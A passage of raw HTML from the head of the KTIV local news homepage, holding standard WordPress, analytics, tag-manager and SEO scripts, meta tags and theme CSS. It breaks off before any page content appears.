<!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html class="no-js lt-ie9" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head> <meta charset="utf-8" /><script type="text/javascript">window.NREUM||(NREUM={}),__nr_require=function(e,n,t){function r(t){if(!n[t]){var o=n[t]={exports:{}};e[t][0].call(o.exports,function(n){var o=e[t][1][n];return r(o||n)},o,o.exports)}return n[t].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<t.length;o++)r(t[o]);return r}({1:[function(e,n,t){function r(){}function o(e,n,t){return function(){return i(e,[c.now()].concat(u(arguments)),n?null:this,t),n?void 0:this}}var i=e("handle"),a=e(3),u=e(4),f=e("ee").get("tracer"),c=e("loader"),s=NREUM;"undefined"==typeof window.newrelic&&(newrelic=s);var p=["setPageViewName","setCustomAttribute","setErrorHandler","finished","addToTrace","inlineHit","addRelease"],d="api-",l=d+"ixn-";a(p,function(e,n){s[n]=o(d+n,!0,"api")}),s.addPageAction=o(d+"addPageAction",!0),s.setCurrentRouteName=o(d+"routeName",!0),n.exports=newrelic,s.interaction=function(){return(new r).get()};var m=r.prototype={createTracer:function(e,n){var t={},r=this,o="function"==typeof n;return i(l+"tracer",[c.now(),e,t],r),function(){if(f.emit((o?"":"no-")+"fn-start",[c.now(),r,o],t),o)try{return n.apply(this,arguments)}catch(e){throw f.emit("fn-err",[arguments,this,e],t),e}finally{f.emit("fn-end",[c.now()],t)}}}};a("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),function(e,n){m[n]=o(l+n)}),newrelic.noticeError=function(e,n){"string"==typeof e&&(e=new Error(e)),i("err",[e,c.now(),!1,n])}},{}],2:[function(e,n,t){function r(e,n){if(!o)return!1;if(e!==o)return!1;if(!n)return!0;if(!i)return!1;for(var t=i.split("."),r=n.split("."),a=0;a<r.length;a++)if(r[a]!==t[a])return!1;return!0}var o=null,i=null,a=/Version\/(\S+)\s+Safari/;if(navigator.userAgent){var u=navigator.userAgent,f=u.match(a);f&&u.indexOf("Chrome")===-1&&u.indexOf("Chromium")===-1&&(o="Safari",i=f[1])}n.exports={agent:o,version:i,match:r}},{}],3:[function(e,n,t){function r(e,n){var t=[],r="",i=0;for(r in e)o.call(e,r)&&(t[i]=n(r,e[r]),i+=1);return t}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],4:[function(e,n,t){function r(e,n,t){n||(n=0),"undefined"==typeof t&&(t=e?e.length:0);for(var r=-1,o=t-n||0,i=Array(o<0?0:o);++r<o;)i[r]=e[n+r];return i}n.exports=r},{}],5:[function(e,n,t){n.exports={exists:"undefined"!=typeof window.performance&&window.performance.timing&&"undefined"!=typeof window.performance.timing.navigationStart}},{}],ee:[function(e,n,t){function r(){}function o(e){function n(e){return e&&e instanceof r?e:e?f(e,u,i):i()}function t(t,r,o,i){if(!d.aborted||i){e&&e(t,r,o);for(var a=n(o),u=v(t),f=u.length,c=0;c<f;c++)u[c].apply(a,r);var p=s[y[t]];return p&&p.push([b,t,r,a]),a}}function l(e,n){h[e]=v(e).concat(n)}function m(e,n){var t=h[e];if(t)for(var r=0;r<t.length;r++)t[r]===n&&t.splice(r,1)}function v(e){return h[e]||[]}function g(e){return p[e]=p[e]||o(t)}function w(e,n){c(e,function(e,t){n=n||"feature",y[t]=n,n in s||(s[n]=[])})}var h={},y={},b={on:l,addEventListener:l,removeEventListener:m,emit:t,get:g,listeners:v,context:n,buffer:w,abort:a,aborted:!1};return b}function i(){return new r}function a(){(s.api||s.feature)&&(d.aborted=!0,s=d.backlog={})}var u="nr@context",f=e("gos"),c=e(3),s={},p={},d=n.exports=o();d.backlog=s},{}],gos:[function(e,n,t){function r(e,n,t){if(o.call(e,n))return e[n];var r=t();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(e,n,{value:r,writable:!0,enumerable:!1}),r}catch(i){}return e[n]=r,r}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],handle:[function(e,n,t){function r(e,n,t,r){o.buffer([e],r),o.emit(e,n,t)}var o=e("ee").get("handle");n.exports=r,r.ee=o},{}],id:[function(e,n,t){function r(e){var n=typeof e;return!e||"object"!==n&&"function"!==n?-1:e===window?0:a(e,i,function(){return o++})}var o=1,i="nr@id",a=e("gos");n.exports=r},{}],loader:[function(e,n,t){function r(){if(!E++){var e=x.info=NREUM.info,n=l.getElementsByTagName("script")[0];if(setTimeout(s.abort,3e4),!(e&&e.licenseKey&&e.applicationID&&n))return s.abort();c(y,function(n,t){e[n]||(e[n]=t)}),f("mark",["onload",a()+x.offset],null,"api");var t=l.createElement("script");t.src="https://"+e.agent,n.parentNode.insertBefore(t,n)}}function o(){"complete"===l.readyState&&i()}function i(){f("mark",["domContent",a()+x.offset],null,"api")}function a(){return O.exists&&performance.now?Math.round(performance.now()):(u=Math.max((new Date).getTime(),u))-x.offset}var u=(new Date).getTime(),f=e("handle"),c=e(3),s=e("ee"),p=e(2),d=window,l=d.document,m="addEventListener",v="attachEvent",g=d.XMLHttpRequest,w=g&&g.prototype;NREUM.o={ST:setTimeout,SI:d.setImmediate,CT:clearTimeout,XHR:g,REQ:d.Request,EV:d.Event,PR:d.Promise,MO:d.MutationObserver};var h=""+location,y={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",agent:"js-agent.newrelic.com/nr-1123.min.js"},b=g&&w&&w[m]&&!/CriOS/.test(navigator.userAgent),x=n.exports={offset:u,now:a,origin:h,features:{},xhrWrappable:b,userAgent:p};e(1),l[m]?(l[m]("DOMContentLoaded",i,!1),d[m]("load",r,!1)):(l[v]("onreadystatechange",o),d[v]("onload",r)),f("mark",["firstbyte",u],null,"api");var E=0,O=e(5)},{}]},{},["loader"]);</script> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Home - KTIV</title> <!-- Google Tag Manager for WordPress by gtm4wp.com --> <script data-cfasync="false" type="text/javascript">//<![CDATA[ var gtm4wp_datalayer_name = "dataLayer"; var dataLayer = dataLayer || []; //]]> </script> <!-- End Google Tag Manager for WordPress by gtm4wp.com --> <!-- This site is optimized with the Yoast SEO plugin v9.0.2 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="KTIV is Siouxland&#039;s News Channel! Our mission is to provide you with the latest news, weather and sports in Siouxland. Whether its on-air, online or while you&#039;re on the go, you can count on News 4."/> <link rel="canonical" href="https://ktiv.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Home - KTIV" /> <meta property="og:description" content="KTIV is Siouxland&#039;s News Channel! Our mission is to provide you with the latest news, weather and sports in Siouxland. Whether its on-air, online or while you&#039;re on the go, you can count on News 4." /> <meta property="og:url" content="https://ktiv.com/" /> <meta property="og:site_name" content="KTIV" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="KTIV is Siouxland&#039;s News Channel! Our mission is to provide you with the latest news, weather and sports in Siouxland. Whether its on-air, online or while you&#039;re on the go, you can count on News 4." /> <meta name="twitter:title" content="Home - KTIV" /> <meta name="twitter:image" content="https://ktiv.com/wp-content/uploads/sites/4/2019/03/DONATENOW-300x50.png" /> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/ktiv.com\/","name":"KTIV","potentialAction":{"@type":"SearchAction","target":"https:\/\/ktiv.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//www.googletagservices.com' /> <link rel='dns-prefetch' href='//cdn.jsdelivr.net' /> <link rel='dns-prefetch' href='//unpkg.com' /> <link rel='dns-prefetch' href='//ktiv.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="KTIV &raquo; Feed" href="https://ktiv.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="KTIV &raquo; Comments Feed" href="https://ktiv.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/ktiv.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='cordillera-ads-styles-css' href='https://ktiv.com/wp-content/plugins/cordillera-ads/assets/css/ads.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='cordillera-intra-articles-css' href='https://ktiv.com/wp-content/plugins/cordillera-intra-article-nav/assets/css/intra-articles.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='cordillera-video-embed-css' href='https://ktiv.com/wp-content/plugins/cordillera-post-modification/assets/css/video-embed.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='wp-polls-css' href='https://ktiv.com/wp-content/plugins/wp-polls/polls-css.css?ver=2.75.2' type='text/css' media='all' /> <style id='wp-polls-inline-css' type='text/css'> .wp-polls .pollbar { margin: 1px; font-size: 6px; line-height: 8px; height: 8px; background-image: url('https://ktiv.com/wp-content/plugins/wp-polls/images/default/pollbg.gif'); border: 1px solid #c8c8c8; } </style> <link rel='stylesheet' id='cordillera-weather-icon-styles-css' href='https://ktiv.com/wp-content/plugins/cordillera-current-weather-conditions/assets/css/weather-icons.min.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='cordillera-current-conditions-styles-css' href='https://ktiv.com/wp-content/plugins/cordillera-current-weather-conditions/assets/css/current-conditions.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='pojo-a11y-css' href='https://ktiv.com/wp-content/plugins/pojo-accessibility/assets/css/style.min.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-icons-css' href='https://ktiv.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=3.6.0' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://ktiv.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-animations-css' href='https://ktiv.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=2.1.6' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-frontend-css' href='https://ktiv.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=2.1.6' type='text/css' media='all' /> <style id='elementor-frontend-inline-css' type='text/css'> /* Start custom CSS for wp-widget-pojo_recent_posts, class: .elementor-element-22bd4da9 */.elementor-12 .elementor-element.elementor-element-22bd4da9 .entry-meta { margin-top: 0px; margin-bottom: -5px; }/* End custom CSS */ </style> <link rel='stylesheet' id='elementor-pro-css' href='https://ktiv.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=2.1.2' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-post-12-css' href='https://ktiv.com/wp-content/uploads/sites/4/elementor/css/post-12.css?ver=1557166723' type='text/css' media='all' /> <link rel='stylesheet' id='__EPYT__style-css' href='https://ktiv.com/wp-content/plugins/youtube-embed-plus/styles/ytprefs.min.css?ver=12.2' type='text/css' media='all' /> <style id='__EPYT__style-inline-css' type='text/css'> .epyt-gallery-thumb { width: 33.333%; } </style> <link rel='stylesheet' id='pojo-css-framework-css' href='https://ktiv.com/wp-content/themes/buzz/assets/bootstrap/css/bootstrap.min.css?ver=3.3.5' type='text/css' media='all' /> <link rel='stylesheet' id='photoswipe-css' href='https://ktiv.com/wp-content/plugins/pojo-lightbox/assets/photoswipe/photoswipe.min.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='photoswipe-skin-css' href='https://ktiv.com/wp-content/plugins/pojo-lightbox/assets/photoswipe/default-skin/default-skin.min.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='pojo-base-style-css' href='https://ktiv.com/wp-content/themes/buzz/core/assets/css/style.min.css?ver=1.7.12' type='text/css' media='all' /> <link rel='stylesheet' id='pojo-style-css' href='https://ktiv.com/wp-content/themes/buzz-child/assets/css/style.css?ver=1.7.12' type='text/css' media='all' /> <link rel='stylesheet' id='google-fonts-1-css' href='https://fonts.googleapis.com/css?family=Montserrat%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&#038;ver=4.9.8' type='text/css' media='all' /> <script type='text/javascript' src='https://www.googletagservices.com/tag/js/gpt.js'></script> <script type='text/javascript' src='https://cdn.jsdelivr.net/npm/vue?ver=2.5.16'></script> <script type='text/javascript' src='https://unpkg.com/axios/dist/axios.min.js?ver=0.18.0'></script> <script type='text/javascript' src='https://ktiv.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://ktiv.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/cordillera-current-weather-conditions/assets/js/current-conditions.js'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.9'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-youtube.js?ver=1.9'></script> <script type='text/javascript'> /* <![CDATA[ */ var _EPYT_ = {"ajaxurl":"https:\/\/ktiv.com\/wp-admin\/admin-ajax.php","security":"7f4cbc4a19","gallery_scrolloffset":"20","eppathtoscripts":"https:\/\/ktiv.com\/wp-content\/plugins\/youtube-embed-plus\/scripts\/","epresponsiveselector":"[\"iframe.__youtube_prefs_widget__\"]","epdovol":"1","version":"12.2","evselector":"iframe.__youtube_prefs__[src], iframe[src*=\"youtube.com\/embed\/\"], iframe[src*=\"youtube-nocookie.com\/embed\/\"]","ajax_compat":"","ytapi_load":"light","stopMobileBuffer":"1","vi_active":"","vi_js_posttypes":[]}; /* ]]> */ </script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/youtube-embed-plus/scripts/ytprefs.min.js?ver=12.2'></script> <link rel='https://api.w.org/' href='https://ktiv.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://ktiv.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://ktiv.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.8" /> <link rel='shortlink' href='https://ktiv.com/' /> <link rel="alternate" type="application/json+oembed" href="https://ktiv.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fktiv.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://ktiv.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fktiv.com%2F&#038;format=xml" /> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <!-- Google Tag Manager for WordPress by gtm4wp.com --> <script data-cfasync="false" type="text/javascript">//<![CDATA[ dataLayer.push({"siteID":"4","siteName":"KTIV","pageTitle":"Home - KTIV","pagePostType":"frontpage","pagePostType2":"single-page","pageCategory":["homepage"],"pageAttributes":["iowa","ktiv","nebraska","news","sioux-city","siouxland","south-dakota"],"pagePostAuthorID":1,"pagePostAuthor":"adwpadmin"});//]]> </script> <script data-cfasync="false">//<![CDATA[ (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= '//www.googletagmanager.com/gtm.'+'js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-T7J729R');//]]> </script> <!-- End Google Tag Manager --> <!-- End Google Tag Manager for WordPress by gtm4wp.com --><link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic|Open+Sans:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic|Roboto:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic|Droid+Serif:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic"><style type="text/css">body{background-color: rgba(236, 240, 241, 1);background-position: top center;background-repeat: repeat;background-size: auto;background-attachment: scroll;color: #5e5e5e; font-family: 'Roboto', Arial, sans-serif; font-weight: normal; font-size: 17px;line-height: 1.5em;}#primary{background-color: rgba(255, 255, 255, 1);background-position: top center;background-repeat: repeat;background-size: auto;background-attachment: scroll;}button,.button,#commentform .button{color: #ffffff; font-family: 'Montserrat', Arial, sans-serif; font-weight: bold; font-size: 15px;text-transform: uppercase;background-color: #e74c3c;border-color: #e74c3c;}button:hover,.button:hover,#commentform .button:hover{color: #e74c3c;background-color: #ffffff;border-color: #e74c3c;}div.logo-text a{color: #34495e; font-family: 'Montserrat', Arial, sans-serif; font-weight: bold; font-size: 44px;line-height: 1;}.logo{margin-top: 10px;margin-bottom: 0px;}#top-bar{background-color: rgba(51, 59, 78, 1);background-position: top center;background-repeat: repeat-x;background-size: auto;background-attachment: scroll;}#top-bar, #top-bar .widget-title{color: #ecf0f1; font-family: 'Open Sans', Arial, sans-serif; font-weight: 600; font-size: 12px;text-transform: uppercase;letter-spacing: 0px;font-style: normal;line-height: 45px;}#top-bar a{color: #ecf0f1;}#top-bar a:hover{color: #c9181e;}#header, .sticky-header{background-color: rgba(51, 59, 78, 1);background-position: top center;background-repeat: repeat-x;background-size: auto;background-attachment: scroll;}.sf-menu a, .mobile-menu a{color: #ffffff; font-family: 'Montserrat', Arial, sans-serif; font-weight: 400; font-size: 15px;text-transform: uppercase;}.sf-menu a:hover,.sf-menu li.active a, .sf-menu li.current-menu-item > a,.sf-menu .sfHover > a,.sf-menu .sfHover > li.current-menu-item > a,.sf-menu li.current-menu-ancestor > a,.mobile-menu a:hover,.mobile-menu li.current-menu-item > a, a.search-toggle .fa-times{color: #d60000;}.nav-main .sf-menu .sub-menu{background-color: #2c3e50;}.nav-main .sf-menu .sub-menu li:hover > a,.nav-main .sf-menu .sub-menu li.current-menu-item > a{background-color: #d60000;color: #ecf0f1;}.nav-main .sf-menu .sub-menu li a{color: #ecf0f1; font-family: 'Roboto', Arial, sans-serif; font-weight: 400; font-size: 13px;text-transform: capitalize;line-height: 3.3em;}.search-section{background-color: rgba(232, 232, 232, 1);background-position: top center;background-repeat: repeat-x;background-size: auto;background-attachment: scroll;}.search-section,.search-section .form-search .field{color: #000000;}#sub-header{background-color: rgba(206, 47, 47, 1);background-position: top center;background-repeat: repeat-x;background-size: auto;background-attachment: scroll;}#sub-header, #sub-header .widget-title{color: #ffffff; font-family: 'Montserrat', Arial, sans-serif; font-weight: bold; font-size: 20px;text-transform: none;letter-spacing: 1.5px;font-style: normal;line-height: 30px;}#sub-header a{color: #ffffff;}#sub-header a:hover{color: #e74c3c;}#title-bar{height: 100px;line-height: 100px;color: #7f8c8d; font-family: 'Montserrat', Arial, sans-serif; font-weight: normal; font-size: 17px;text-transform: uppercase;}#title-bar.title-bar-style-custom_bg{background-color: rgba(236, 240, 241, 1);background-position: center center;background-repeat: repeat;background-size: cover;background-attachment: scroll;}#title-bar div.breadcrumbs, #title-bar div.breadcrumbs a{color: #7f8c8d; font-family: 'Droid Serif', Arial, sans-serif; font-weight: normal; font-size: 11px;text-transform: uppercase;letter-spacing: 1.2px;font-style: italic;}a{color: #95a5a6;}a:hover, a:focus{color: #e74c3c;}::selection{color: #ffffff;background: #e74c3c;}::-moz-selection{color: #ffffff;background: #e74c3c;}h1{color: #000000; font-family: 'Montserrat', Arial, sans-serif; font-weight: normal; font-size: 30px;text-transform: none;letter-spacing: -0.5px;font-style: normal;line-height: 1.2em;}h2{color: #000000; font-family: 'Montserrat', Arial, sans-serif; font-weight: 400; font-size: 32px;text-transform: none;font-style: normal;line-height: 1.2em;}h3{color: #000000; font-family: 'Montserrat', Arial, sans-serif; font-weight: 500; font-size: 18px;text-transform: none;font-style: italic;line-height: 1.2em;}h4{color: #000000; font-family: 'Montserrat', Arial, sans-serif; font-weight: 500; font-size: 17px;text-transform: none;font-style: normal;line-height: 1.2em;}h5{color: #000000; font-family: 'Montserrat', Arial, sans-serif; font-weight: 500; font-size: 18px;text-transform: uppercase;font-style: normal;line-height: 1.2em;}h6{color: #e74c3c; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 17px;text-transform: none;font-style: normal;line-height: 1.2em;}h3.media-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 500; font-size: 18px;text-transform: none;font-style: normal;line-height: 1.2em;}.media.list-two h3.media-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 500; font-size: 16px;text-transform: none;font-style: normal;line-height: 1.2em;}.media.list-three h3.media-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 500; font-size: 15px;text-transform: none;font-style: normal;line-height: 1.2em;}.media.list-format h3.media-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 27px;text-transform: none;font-style: normal;line-height: 1.2em;}.grid-item.grid-one h4.grid-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 22px;text-transform: none;font-style: normal;line-height: 1.2em;}.grid-item.grid-two h4.grid-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 20px;text-transform: none;font-style: normal;line-height: 1.2em;}.grid-item.grid-three h4.grid-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 16px;text-transform: none;font-style: normal;line-height: 1.2em;}.grid-item.grid-four h4.grid-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 16px;text-transform: none;font-style: normal;line-height: 1.2em;}.grid-item.cover-item .caption .grid-heading,.grid-item.cover-item .caption .entry-meta span,.grid-item.cover-item .caption .entry-excerpt p,.grid-item.cover-item .caption .read-more{color: #ffffff;}.posts-group .featured-post h3.media-heading,.posts-group .featured-post h3.grid-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 24px;text-transform: none;font-style: normal;line-height: 1.2em;}.posts-group h3.media-heading,.posts-group h4.grid-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 16px;text-transform: none;font-style: normal;line-height: 1.2em;}.entry-meta > span, .more-link span,.read-more{color: #95a5a6; font-family: 'Roboto', Arial, sans-serif; font-weight: normal; font-size: 12px;text-transform: none;font-style: normal;}.entry-post .entry-meta > span{color: #95a5a6; font-family: 'Montserrat', Arial, sans-serif; font-weight: normal; font-size: 12px;text-transform: none;font-style: normal;line-height: 1em;}.entry-excerpt{color: #5e5e5e; font-family: 'Roboto', Arial, sans-serif; font-weight: normal; font-size: 15px;text-transform: none;font-style: normal;line-height: 1.3em;}.entry-post .entry-excerpt{color: #5e5e5e; font-family: 'Roboto', Arial, sans-serif; font-weight: bold; font-size: 17px;text-transform: none;font-style: italic;line-height: 20px;}.category-label{color: #ffffff; font-family: 'Montserrat', Arial, sans-serif; font-weight: normal; font-size: 11px;text-transform: uppercase;font-style: normal;}#primary #breadcrumbs,#primary #breadcrumbs a, nav.post-navigation{color: #7f8c8d; font-family: 'Roboto', Arial, sans-serif; font-weight: normal; font-size: 14px;text-transform: none;font-style: normal;line-height: 1em;}#sidebar{color: #5e5e5e; font-family: 'Roboto', Arial, sans-serif; font-weight: normal; font-size: 15px;text-transform: none;font-style: normal;line-height: 21px;}#sidebar a{color: #5e5e5e;}#sidebar a:hover{color: #e74c3c;}#sidebar .widget-title{color: #7f8c8d; font-family: 'Montserrat', Arial, sans-serif; font-weight: bold; font-size: 15px;text-transform: uppercase;font-style: normal;line-height: 1;}#footer-widgets{background-color: rgba(44, 62, 80, 1);background-position: top center;background-repeat: repeat;background-size: auto;background-attachment: scroll;color: #ecf0f1; font-family: 'Roboto', Arial, sans-serif; font-weight: normal; font-size: 14px;text-transform: none;font-style: normal;line-height: 1.5em;}#footer-widgets a{color: #ecf0f1;}#footer-widgets a:hover{color: #e74c3c;}#footer-widgets .widget-title{color: #e74c3c; font-family: 'Montserrat', Arial, sans-serif; font-weight: normal; font-size: 17px;text-transform: uppercase;font-style: normal;line-height: 2;}#footer-copyright{background-color: rgba(44, 62, 80, 1);background-position: top center;background-repeat: repeat;background-size: auto;background-attachment: scroll;color: #ecf0f1; font-family: 'Montserrat', Arial, sans-serif; font-weight: normal; font-size: 10px;text-transform: uppercase;font-style: normal;line-height: 70px;}#footer-copyright a{color: #ecf0f1;}#footer-copyright a:hover{color: #ffffff;}#pojo-scroll-up{width: 50px;height: 50px;line-height: 50px;background-color: rgba(51, 51, 51, 0.6);background-position: top center;background-repeat: repeat;background-size: auto;background-attachment: scroll;}#pojo-scroll-up a{color: #eeeeee;}.sf-menu a, .menu-no-found,.sf-menu li.pojo-menu-search,.search-header{line-height: 30px;}.sf-menu li:hover ul, .sf-menu li.sfHover ul{top: 30px;}a.search-toggle{color: #ffffff;}.navbar-toggle{border-color: #ffffff;}.icon-bar{background-color: #ffffff;}#sub-header ul.social-links li a .social-icon:before{line-height: 30px;height: 30px;width: 30px;}</style> <style type="text/css"> #pojo-a11y-toolbar .pojo-a11y-toolbar-toggle a{ background-color: #4054b2; color: #ffffff;} #pojo-a11y-toolbar .pojo-a11y-toolbar-overlay, #pojo-a11y-toolbar .pojo-a11y-toolbar-overlay ul.pojo-a11y-toolbar-items.pojo-a11y-links{ border-color: #4054b2;} body.pojo-a11y-focusable a:focus{ outline-style: solid !important; outline-width: 1px !important; outline-color: #FF0000 !important;} #pojo-a11y-toolbar{ top: 100px !important;} #pojo-a11y-toolbar .pojo-a11y-toolbar-overlay{ background-color: #ffffff;} #pojo-a11y-toolbar .pojo-a11y-toolbar-overlay ul.pojo-a11y-toolbar-items li.pojo-a11y-toolbar-item a, #pojo-a11y-toolbar .pojo-a11y-toolbar-overlay p.pojo-a11y-toolbar-title{ color: #333333;} #pojo-a11y-toolbar .pojo-a11y-toolbar-overlay ul.pojo-a11y-toolbar-items li.pojo-a11y-toolbar-item a.active{ background-color: #4054b2; color: #ffffff;} @media (max-width: 767px) { #pojo-a11y-toolbar { top: 50px !important; } }</style><link rel="icon" href="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/05/21151732/cropped-ktiv-e1526493608612-32x32.png" sizes="32x32" /> <link rel="icon" href="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/05/21151732/cropped-ktiv-e1526493608612-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/05/21151732/cropped-ktiv-e1526493608612-180x180.png" /> <meta name="msapplication-TileImage" 